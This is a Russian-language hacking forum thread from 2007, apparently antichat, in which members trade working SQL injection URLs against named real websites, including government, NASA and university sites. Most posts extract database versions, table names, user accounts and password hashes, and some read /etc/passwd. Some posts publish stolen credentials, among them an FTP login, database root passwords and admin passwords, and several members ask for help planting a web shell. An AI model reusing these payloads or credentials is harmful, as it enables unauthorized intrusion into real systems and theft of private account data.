Админка на украинском (бля я не фига не понял =) )
http://www.sakhalin.environment.ru/news.php?id=-1+union+select+1,2,concat(0x21,version(),0x21,user (),0x21),4,5+from+news/*
version:4.0.27
user:sakhvatch@localhost
таблицы особо не старалса подбирать (тока news нашел и усе)
http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,concat(0x21,version(),0x21,us er(),0x21),5,6,7,8,9/*
version:4.0.27-log
user:metalistfans@localhost
http://www.dm-centre.ru/inner.php?page=podrazdel&id=-1+union+select+version(),concat(username,0x21,user _password)+from+phpbb_users/*
На форум:
ADMIN
827ccb0eea8a706c4c34a16891f84e7b
http://www.download.ru/authors/?task=statistik&program=31099+order+by+3--&type=1
юнион не работает, вывести не смог.
http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/*
http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+fr om+mysql.user/*
Joker-jar
11.08.2007, 08:31
http://driver.ru/?file_id=31819+and+ascii(lower(substring(version() ,1,1)))=0x34
MySQL 4.x
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
Ну вроде бы обычная скуля, ничего примечательного, однако:
Кавычки не фильтруются
есть file priv...
есть доступ к mysql.user
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,user,password,load_file('/etc/passwd'),6,7,8,9,10+from+mysql.user+limit+0,1/*
Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь.
Удачи =)
PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят.
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной
Ну вроде бы обычная скуля, ничего примечательного, однако:
Кавычки не фильтруются
есть file priv...
есть доступ к mysql.user
Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь.
Удачи =)
PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят.
Там еще Post Sql inj:
вход:
1' or 1=1/*
в админке авторизация базик
http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,TA BLE_NAME,4%20FROM+INFORMATION_SCHEMA.TABLES%20limi t%200,1/*
http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,co lumn_name,4%20FROM+information_schema.columns%20li mit%200,1/*
phol1eadeux
13.08.2007, 11:29
http://top.kmvcity.ru/stat.php?id=1' < - ругается на SQL синтакс
при подборе через +order+by ничего нельзя добиться.
что можно получить с этого сайта "толкового"?
Подобрал кол-во столбцов:
http://top.kmvcity.ru/stat.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
Попробуй угадать таблицы ;)
большая бд :)
http://www.comicbookresources.com/news/newsitem.cgi?id=-11511+union+select+1,2,3,4,concat_ws(0x203a20,id,n ame,password,email),6,7,8+from+users+limit+16000,1/*
phol1eadeux
13.08.2007, 15:32
инъекция тут
http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14/*
таблица users
инъекция тут
http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14/*
таблица users
http://www.dog.ru/index.php3?mode=5&id=417652--00+union+select+1,2,3,4,5,concat(name,char(58),pas swd,char(58),email,char(58),id,char(58),version(), char(58),user(),char(58),database()),7,8,9,10,11,1 2,13,14%20from%20users%20limit%200,1/*
+table "search"
groundhog
13.08.2007, 17:09
http://www.flashonthebeach.com
http://www.flashonthebeach.com/speakers/index.php?pageid=-1+UNION+SELECT+1,USER(),3,4,VERSION()/*
phol1eadeux
13.08.2007, 17:15
http://fckhimki.ru/modules/players/print.php?current_id=&player_id=-1+union+select+1,2,3,4,5,6,concat(name,char(58),he ight,char(58),weight,char(58),country,char(58),pos ition),8,9,10,11,12,13,14,15,16,17,18,19,20+from+p layers+limit+0,1/*
база: fckhimki_new1;
версия: 4.0.27-max-log;
юзер: fckhimki_new1@v2.valuehost.ru
К базам mysql и forum подобраться не получиться, зато
можно поиздеваться над таблицами news и players ;)
groundhog
13.08.2007, 17:31
http://www.sat-tv.ru
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,CONCAT_WS(CHAR(42),VERSION(),USER (),DATABASE()),3,4,5,6,7,8,9,0+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,0+FROM+I NFORMATION_SCHEMA.TABLES+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,0+FROM+ INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(0 x55,0x73,0x65,0x72,0x73)+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,CONCAT_WS(CHAR(42),Login,Password ),3,4,5,6,7,8,9,0+FROM+Users+--+
groundhog
13.08.2007, 18:16
чет у меня ничего не получается,мож у кого получится
код:
http://www.reviews.ru/clause/article.asp?id=2155
Вот подобрано количество полей:
http://www.reviews.ru/clause/article.asp?id=-1+UNION+SELECT+1,2,cast(3+as+nvarchar),4,cast(5+as +nvarchar),cast(6+as+nvarchar),cast(7+as+nvarchar) ,cast(8+as+nvarchar),cast(9+as+nvarchar),10,11,12, cast(13+as+nvarchar),cast(15+as+nvarchar)--
Но он на такой запросы выдаёт:
Microsoft OLE DB Provider for SQL Server error '80040e14'
The text, ntext, or image data type cannot be selected as DISTINCT.
D:\HOME\REVIEWS\HTML\CLAUSE\../inc/article/article.asp, line 23
Как это обойти я не допёр...
Calcutta
14.08.2007, 06:23
http://gorodclub.ru/adm/forum/home.viewprofile.php?user=-1'+union+select+1,2,3,4,5,6/*
странно, но ни 1 названия не мог подобрать
зато в админку зашел стандартным ' or 'a'='a (;
http://m.wazzap.ru/m/photo/?code=46b2bdffwfcodusoij&id=%27
select photo_id, photo_desc from mf_user_photo where user_id=' and photo_visible='Y' LIMIT 0, 5
это иньекция?
Red_Red1
15.08.2007, 11:40
2 ruzzer
Вот иньекция
http://m.wazzap.ru/m/photo/?id=-72813%20union%20select%201,TABLE_NAME%20from%20INF ORMATION_SCHEMA.TABLES/*
phol1eadeux
15.08.2007, 15:26
Небольшая мыльная база ;)
http://www.spbgid.ru/index.php?type=-1+union+select+1,mail,3+from+mail/*
+ как всегда, таблица 'news'
З.Ы. Должна быть еще таблица кампаний(тоже с мыльниками), но я не нашел...
-=lebed=-
15.08.2007, 15:54
Слепая sql-inj, кроме таблицы news и колонки n_id ничего не подобрал..., а ещё есть колонки o_id и rc_id, только вот в каких таблицах? Имхо должны быть таблицы авторов и оппонентов, если я правильно понял из самого сайта...
http://www.ortodoxmedia.com/autor.php?autor=-1+union+select+1,user(),n_id,4,5,version()+from+ne ws+where+n_id=15/*
ЗЫ Может кто копнёт поглубже? Подгузка файла (load_file()) тут сработает?
http://sololiteratura.com/php/autor.php?id=-1+union+select+user(),version(),null/*
-=lebed=-
15.08.2007, 16:17
_http://www.textdiebe.de/werkstatt/autor.php?autor=-1234+union+select+1,2,3,4,user(),version(),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35/*
_http://www.entornoarte.com:81/ea/autor.php?id=-1+union+select+concat(user(),version()),2/*
Чтоб увидеть значения, наведите мышкой на отсутствующий рисунок. ;)
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+3/* - всё ок!
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+4/* - ошибка!
То есть число столбцов как бы = 3
но почему тогда:
_http://digital.el-esceptico.org/autor.php?autor=635+union+select+1,2,3/*
The used SELECT statements have a different number of columns
ЗЫ Дак сколько там столбцов?
phol1eadeux
15.08.2007, 18:52
http://media.utmn.ru/news.php?show_news=-1+union+select+concat(nick,char(58),pwd,char(58),e mail)+from+users/*
в поле 'pwd' лежат хеши
geezer.code
15.08.2007, 19:39
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+3/* - всё ок!
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+4/* - ошибка!
То есть число столбцов как бы = 3
но почему тогда:
_http://digital.el-esceptico.org/autor.php?autor=635+union+select+1,2,3/*
ЗЫ Дак сколько там столбцов?
Столбцов как бы 3 только вот мускул 3 версии, соответственно union не поддерживает.
halkfild
15.08.2007, 19:51
2 geezer.code
неД))
версия 4
http://digital.el-esceptico.org/autor.php?autor=635+and+(ascii(substring(VERSION() ,1,1))=52)
2 -=lebed=-
может там 2 запроса.. в одном 3 столбца, а во втором нет
halkfild
15.08.2007, 19:59
а вот тут все ок.. кста потвердилась моя версия
http://digital.el-esceptico.org/leer.php?id=2545&autor=7&tema=-115+union+select+1,CONCAT_WS(CHAR(42),VERSION(),US ER(),DATABASE())/*
4.1.21*eed-lectura@localhost*esceptico
geezer.code
15.08.2007, 22:54
pr=4
www.solar-ct.com
http://www.catalogue.solar-ct.com/plugins/catalog/catalog_view.php?id=-23+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r_name,user_loginname,user_password,user_email),10 ,11,12,13,14,15,16,17,18,19+from+solar_user+limit+ 0,1/*
brigada.uz
http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_na me,user_loginname,user_password,user_email,user_hi deemail,user_join,user_ip,version()),8,9,10,11,12, 13,14+from+brigada_user
пароли в хэше... писала одна и та же студия ))) поищу ещще что нить у них.
Red_Red1
15.08.2007, 23:39
http://www.chita.ru/firms/index.php?page=view&id=-9302+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24+from+infor mation_schema.tables+WHERE+TABLE_NAME+NOT+IN+(CHAR (67,72,65,82,65,67,84,69,82,95,83,69,84,83))/*
Вот решил запостить, мне понравилось тут раскапывать. Интересно работать с пятой версией мускула но...
Таблицы найдены, пароли получены, вот только куда их подставлять я не нашел - может кто докопает. Я эту скулю у себя хранил долго, покуда не разузнал про пятую версию мускула, а потом ковырялся в старых залежах набрал version() и о чудо 5.ХХ.ХХ, а это значит можно узнать все таблицы и т.д.!!!!!
Вот кстати и таблички
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
auth_user id, site_id, username, password, permis, userlevel - это столбики
forget_psw
images
inetcat_anti_cheat
proxys
sessions
sites
user_tables
user_tables_fields
user_tables_params
ut_afisha
ut_brd
ut_brd_users
ut_citys
ut_firm_offers
ut_firms
ut_inetcat
ut_money
ut_news
ut_news_nlist
ut_offer_types
ut_sources
ut_tv
ut_tv_descrs
ut_tv_genres
Жаль до шелла не дошло.... может кто???..., а нет так и ладно
Nazaret2005
16.08.2007, 02:02
http://hells.timeserv.biz/cms/page_view.php?id=110+union+select+1,2,password,adm in+from+settings/*
version 4.1.21-standard
-=lebed=-
16.08.2007, 14:26
_http://www.hudaweb.com/movlit//autor.php?autor=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*
Зы со скриптом подбор колонок стал намного быстрее...
P.S. Скрипт можно взять тут: https://forum.antichat.ru/thread46849.html
Удачных скулей!
-=lebed=-
16.08.2007, 14:42
_http://www.elforat.net/autor.php?id=-1+union+select+1,2,3,4,5/*
http://www.bajazzoverlag.ch/autor.php?id=-1+union+select+1,2,3,4,5,6,7/*
_http://www.3darena.de/autor/php/autor.php?autor_id=-1+union+select+concat(user(),version())/*
geezer.code
16.08.2007, 19:42
вэб-дизайн Студия 5d.ru :)
http://www.iq-design.ru/content.php?act=tehnolog&div=-6+union+select+1,version(),3,4+from+news/*
http://www.nikas-s.ru/gallery.php?tab=photo&dir=-3+union+select+1,2,3,version(),5,6/*
http://www.interstahl.ru/?act=news&id=-2+union+select+1,2,3,4,5,user()
http://www.countrytravel.ru/second.php?act=main&div=-2+union+select+1,2,version(),4,5/*
http://www.razvod.ru/man.php?id=-651+union+select+1,2,3,concat_ws(0x3a,name,version ()),5,6,7,8,9+from+authors/*
http://www.albitec.ru/content.php?cat=news&id=-25+union+select+1,2,3,4,5,6,7,8/*
http://www.interfax-religion.ru/?act=dujour&div=-275+union+select+1,version(),3,4,5,6,7,8,9,10/*
http://www.hifitech.ru/?act=product&id=-2632+union+select+1/*
http://www.kiyama.ru/content.php?act=mnu&browse=node&id=-64+union+select+1,2,3,4,5,6,7,8/*
http://www.bladeserver.ru/?act=news&id=-7+union+select+1,2,3,4,char(60,98,114,62,60,98,62, 65,52,97,116,45,114,117,108,101,122,122,122,122,60 ,47,98,62),6,7,8,9/*
ребята очень упорно плодят уязвимые сайты :)
Моя первая SQL Инъекция :\
http://www.rapha.cc/index.php?page=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Nazaret2005
17.08.2007, 00:57
Sharelita !
http://www.sharelita.com/newsfile.php?fileid=-10+union+select+id,2,3,4,concat(name,char(58),pass word),6,7,8,9,10,email+from+users+where+id=2+limit +0,1/*
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
Calcutta
17.08.2007, 10:15
http://wow.crpg.ru/article.php?sid=-1+union+select+database(),2,version(),4,5,6,7,user (),9,10,11,12/*
дальше не пошло =(
Red_Red1
17.08.2007, 11:00
По моему тут надо таким способом, а иначе фильтрация работает...
http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12/*
З.Ы. Но дальше тоже не пошло :(
Серенький
17.08.2007, 14:34
Red_Red1 Calcutta
По моему тут надо таким способом, а иначе фильтрация работает...
http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12/*
З.Ы. Но дальше тоже не пошло
-->
http://wow.crpg.ru/article.php?sid=11+union+select+1,2,3,4,5,concat_w s(0x3a,uname,pass),7,8,9,0,1,2+From+users/*вывода нет
но вывод есть здесь: http://www.rolemancer.ru/sections.php?op=listarticles&secid=-69+union+select+1,2,concat(uname,0x3a,pass),4+from +users/* ибо crpg.ru и rolemancer.ru на одном сервере
/ps/ антибоян http://antiboyansql.narod.ru/sql.txt
------------------------------------------------------------------------
DRoT1Khttp://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/* ->http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,username ,password),8+from+user+limit+3500,1/*
-----------------
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*->http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name,column_name),4,5+from+information_schema.c olumns+where+table_name=0x61757468+limit+1,1/* авторизация http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pass),4,5+f rom+auth+limit+0,1/*
halkfild
17.08.2007, 21:22
http://www.walf.sn/economique/suite.php?rub=-3+union+select+1,concat_ws(0x3a,version(), database(), user()),3,4,5/*&id_art=1
5.0.22-standard-log:new_walbase:walf_admin@localhost
http://www.walf.sn/economique/suite.php?rub=-3+union+select+1,concat_ws(0x3a,login,pass),3,4,5+ from+users/*&id_art=1
walf_admin:#walf!base
http://www.iltod.gov.mn/forum.php?cat=-1+union+select+1,2,USER(),4,5/*
http://www.sante.gouv.sn/actualites.php?id=1+union+select+1,2,3,4/*
http://www.muat.gouv.sn/projets.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,19/*
http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,USER(),4,5,6/*
Red_Red1
18.08.2007, 04:22
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20 user/*
Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
geezer.code
18.08.2007, 14:21
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20 user/*
Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
по формату похоже на MySQL5 хэш
зы так оно и есь
*4ACFE3202A5FF5CF467898FC58AAB1D615029441:admin
http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,login,password, 5,6+from+admin/*
admin: passe
Nazaret2005
18.08.2007, 20:30
по формату похоже на MySQL5 хэш
зы так оно и есь
*4ACFE3202A5FF5CF467898FC58AAB1D615029441:admin
Там все поля admin
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,lastname,4,5,6,firstnam e,userid,9%20from%20%20user/*
Я вычислил имя и фамилию (админ) + id (1) :D
Termin@L
18.08.2007, 22:28
http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat([$%$#$],char(58),pass),0x17),0x17)+from+user/*
Я очень долго .... себе этим мозг, но первое поле подобрать не смог...
Может у кого получится?
З.Ы, вот ещё http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(pass,0x17), 0x17)+from+adm/*
geezer.code
19.08.2007, 00:48
Тут я ничего не могу понять
кто знает разъясните плз
код:
http://www.mtas.ru/second.php?ID=-15+union+select+1/* :confused:
тут многоуровневй запрос
http://www.mtas.ru/second.php?ID=-15+union+select+razdeli_name+from+razdeli/*
вот так работает,)) смотрим текст ошибки ) надо терь подобрать таблицу юзеров ))
[53x]Shadow
19.08.2007, 00:50
Тут я ничего не могу понять
кто знает разъясните плз
код:
http://www.mtas.ru/second.php?ID=-15+union+select+1/* :confused:
Для начала смотри АнтиБоян (http://antiboyansql.narod.ru/sql.txt)
=\
Dr.Frank
19.08.2007, 13:37
.gov:
http://teleslin.lbl.gov/mysql/parseRTML2.php?id=-77+union+select+version(),user(),database(),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
Termin@L
19.08.2007, 18:46
http://www.arsenal-electro.ru/inc.php?include=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x17),0x17),3,4+from+users/*
не могу подобрать название колонки с паролями
Давно сюда не заглядывал, антибаян чекед =)
http://www.business-ua.com/icard2.phtml?id=-111+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(conca t_ws(0x3a,user,password),%20%200x71),0x71),4+from+ mysql.user/*
root:crystaldragon
Кроме version(),user, password дальше не могу ничего подобрать
код:
http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
[53x]Shadow
20.08.2007, 23:23
Кроме version(),user, password дальше не могу ничего подобрать
код:
http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
мона еще хеш админа вытащить...
http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,concat(user,0x3a,password),3,4,5 ,6+from+mysql.user/*
Red_Red1
20.08.2007, 23:31
http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,username,3,4,5,6+from+user/*
Вот это даст имя пользователя, это если ты не подобрал колонку.
Пароль ты нашел. Теперь лезь на фтп и рутай все это дело.
Я проверил работает!!!
ftp://www.kleijngeng.nl/ с такими данными пользователь - kleijnnl пароль - gifts4all
Зря сам не докопал. Все было просто. Я если не нахожу админку всегда пробую фтп.
удачи.
З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.
Termin@L
20.08.2007, 23:50
http://www.ipages.ru/index.php?id=9999+union+select+1,2,database()/*
помогите ето-нить, не могу таблицы подобрать
P.S. Сори за оффтоп киньте ссылку на базу названий таблиц для брутеры
Red_Red1
21.08.2007, 00:12
2 Termin@L Тама есть АКТИВНАЯ ХСС в форуме, может поможет. А таблицы я тоже подобрать не смог.... пока не смог.
Dr.Frank
21.08.2007, 05:45
senate.michigan.gov
http://www.senate.michigan.gov/dem/transcript.php?id=-52%27+union+select+1,2,3,4,5,version(),concat_ws(0 x3a,user,password),8,9,10,11,12+from+mysql.user+li mit+0,1/*
union+select+1,username,3,4,5,6+from+user/*
Вот это даст имя пользователя, это если ты не подобрал колонку.
Пароль ты нашел. Теперь лезь на фтп и рутай все это дело.
Я проверил работает!! Все было просто. Я если не нахожу админку всегда пробую фтп.
удачи.
З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.
я знал имя юзера,а вот что на фтп можно залезть не догадался :)),я ведь только учусь... И все это на смарте,так как компа нет :) спасибо за разъяснение! p.s напишите кто нить им,кто знает английский,что у них дыра,я не смогу т.к плохо знаю язык,скорее понимаю интуитивно :) p.p.s Red_Red1,я не собирался дефейсить,просто интересен процесс добывания паролей и т.д и т. п ;)
KPOT_f!nd
21.08.2007, 09:42
http://www.ceethree.us/comments.php?ID=-2633+union+select+convert(user+using+latin1),2,pas sword,4,5,6,7,8,9,10,11,12+from+mysql.user/*
xrg:*D5951F67E363B61E500DDCEE59583E22197A18E4
geeklog:*3A95B981C7DCF73AB83FCB30A578FB2B2A3940A8
bobrunyon:*1E97552497867D450D5C30F3441CD95BADF5475 1
verlaine:*B383E2B5F9BEBA97F6DD5B16BE21AC0817CD6C10
sfm:*B383E2B5F9BEBA97F6DD5B16BE21AC0817CD6C10
subversal_joomla:*6A700716027A2C2A73D454D1D70438F9 4BDDD6A3
fountain:*4B6E993ECB4E1CDBDFAA3EC73FCC0207D13D6B09
kbaker:*E11948FFC33B0A6A7DE69880072AF5240582B33E
sfm_wordpress1:*8B28E1578D2B7042E304C06F5BADB852FD 00A314
The University of Hong Kong
http://www3.hku.hk/ephku/professor.php?id=1+union+select+1,2,concat(login,0 x3a,password),4,5,6,7,8,9,10,11,12,13+from+user/*
admin:rQfAUxfdIEVxo
groundhog
21.08.2007, 14:04
www.capoeiranachuva.com
http://www.capoeiranachuva.com/index.php?meny=forsiden&com=vis&id=-1+UNION+SELECT+1,VERSION(),USER(),DATABASE(),5,6,7/*
delay(0)
21.08.2007, 19:21
Big6: Information Skills for Student Achievement
Форум (цепляем по одному, кто админ незнаю, мемберлист не смотрел, там регаться надо :)...):
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(username,0x3a,user_passwo rd),2,3,4,5+from+big6_users+limit+1,1/*
Блог (сразу админ):
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(user_login,0x3a,user_pass ),2,3,4,5+from+blo_users+limit+0,1/*
[53x]Shadow
22.08.2007, 02:37
North Dakota
Official Portal for North Dakota State Government
www.nd.gov
http://www.nd.gov/docr/parole/absconder/details.php?SID=-1))+union+select+1,version(),user(),database(),5,6 ,7,8,9,10,11,12,13,14,15/*
MySQL 5.0.24A-DEBIAN_9UBUNTU2-LOG
таблы:
TBL_OFFICERS
TBL_USERS
ковычки фильтруются, колонки не подбирал лень =\
кому интересно informations_schema.columns+limit....
_-Ramos-_
22.08.2007, 09:55
nk.citydom.ru
http://nk.citydom.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0/**/from/**/jos_users/*
The_HuliGun
22.08.2007, 10:45
Впервые вижу, чтобы результат выполнения sql запроса был аргументом функции include()
http://www.tam.ca.gov/view.php?id=-1+union+select+0x2a2a4861436b2a2a/*
Elvis000
22.08.2007, 12:20
http://www.poser.us/view.php?t=0&id=-1+union+select+1,2,3,4,5/*
http://www.poser.us/board/board.php?bid=-1+union+select+1,name,3,4,5,6,7,8,9,10,11,12+from+ users/*
beane@localhost
4.0.12-max-log
poser_us
дальше не получилось, ибо знаний пока не хватает.
delay(0)
22.08.2007, 15:25
Heyman Center for the Humanities
User: heyman@whittier.dreamhost.com
Version: 5.0.24a-standard-log
Database: heymanspt
http://www.heymancenter.org/event_email.php?id=-1+union+select+1,concat(UserName,0x3a,UserPasswo rd),3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7, 8,9,1+from+APUsers+limit+0,1/*
UNA Georgia
We help promote more democratic governance through assisting the government and strengthening civil society.
User: una_ge@localhost
Version: 5.0.22
Database: una_ge
http://una.ge/eng/artdetail.php?group=articles&id=-1+union+select+1,2,concat(name,0x3a,pass wd),4,5,6,7,8,9+from+user+limit+0,1/*
_-Ramos-_
22.08.2007, 18:47
PROBOGA.COM - сайт верующих в Бога
http://proboga.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0/**/from/**/mos_users/*
ЗЫ: да простят меня все верующие
ЗЫ2:не винован я в этой скуле ))
ЗЫ3: да простит меня Бог
geezer.code
22.08.2007, 21:28
портфолио фрилансера...
Его произведения ковырять лень...
Имхо если на родном есть скуль , то и в работах чтонить должно быть.
http://sibprojects.com/index.php?page=-8+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,user(),database(),version()),0x3a),0x3a)/*
Nazaret2005
22.08.2007, 23:24
http://www.viking.tm
http://www.viking.tm/product.php?id=-1+union+select+1,concat(user(),char(58),database() ),version(),44,55,66,77/*
http://www.vikinggames.hu
http://www.vikinggames.hu/product.php?id=-1+union+select+1,concat(user(),char(58),database() ),version(),44,55,66,77/*
geezer.code
23.08.2007, 00:18
http://www.viking.tm
баян, проверяй тут (http://antiboyansql.narod.ru/sql.txt)
вот чтоб, не флудить
http://broker.uz/index.php?a=5&b=-384+union+select+1,2,3,4,5,6,7
вывода нет (((( blind кажецо.
ps точно не blind только все равно неинтересно... нашел сайт месяца 3 назад, такое впечатление, чтокромеменя здесь вообще никто не бывает.
[53x]Shadow
23.08.2007, 00:25
>вывода нет (((( blind кажецо.
Есть вывод смотри в ссылке там где картинка должна быть
http://broker.uz/index.php?a=5&b=-384+union+select+version(),2,3,4,5,6,7/*
смотрим в ссылке на картинку:
http://broker.uz/index.php?a=5&b=4.1.22-standard-log
и т.д.
KPOT_f!nd
23.08.2007, 03:51
http://haytom.us/showarticle.php?id=-19+union+select+1,user(),version(),4,5/*
http://www.learningminds.us/article.php?id=-50708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18+from+users/*&act=print
_-Ramos-_
23.08.2007, 09:20
Порно сайт =))
http://karovideo.com/porno/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8 ,9,10,0x223E3C212D2D,12,13/**/from/**/links/*
admin:admin
Не получается подобрать названия колонок :(
код:
http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
Не получается подобрать названия колонок :(
код:
http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
5 версия
http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,TABLE_NAME,12, 13,14,15,16%20from%20INFORMATION_SCHEMA.TABLES/*
http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 ,13,14,15,16%20from%20information_schema.columns/*
Dr.Frank
23.08.2007, 12:13
опять .gov:
nea.gov:
http://www.nea.gov/honors/heritage/fellows/fellow.php?id=-1993_09%27+union+select+1,AES_DECRYPT(AES_ENCRYPT( concat(user,0x3a,password),0x3a),0x3a),3,4,5,AES_D ECRYPT(AES_ENCRYPT(user(),0x3a),0x3a),AES_DECRYPT( AES_ENCRYPT(version(),0x3a),0x3a),8,9,10,11,12,13, 14,15+from+mysql.user+limit+1,1/*
Dr.Frank
23.08.2007, 12:24
library01.gsfc.nasa.gov:
http://library01.gsfc.nasa.gov/search/images/imageslist.php?id=-470+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat( user,0x3a,password),0x3a),0x3a),3,4,5,AES_DECRYPT( AES_ENCRYPT(user(),0x3a),0x3a),7,8,9,10,11,12,13,A ES_DECRYPT(AES_ENCRYPT(version(),0x3a),0x3a),15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+m ysql.user+limit+0,1/*&searchterm=everything&searchfield=entire
Вроде вывода нету,кто сможет вывести скажите как :)
http://www.amusic.hk/index.php?i=news&id=1'+union+select+id,password,3,4,5,6,7,8+from+a_ users/*
Не смог подобрать таблицы
http://www.gcc.ca/newsarticle.php?id=1+union+select+1,2,3,4,5/*
http://www.game-ost.ru/news_comments.php?id=-298+union+select+1,2,3,4,5,6,7,8,9,10/*
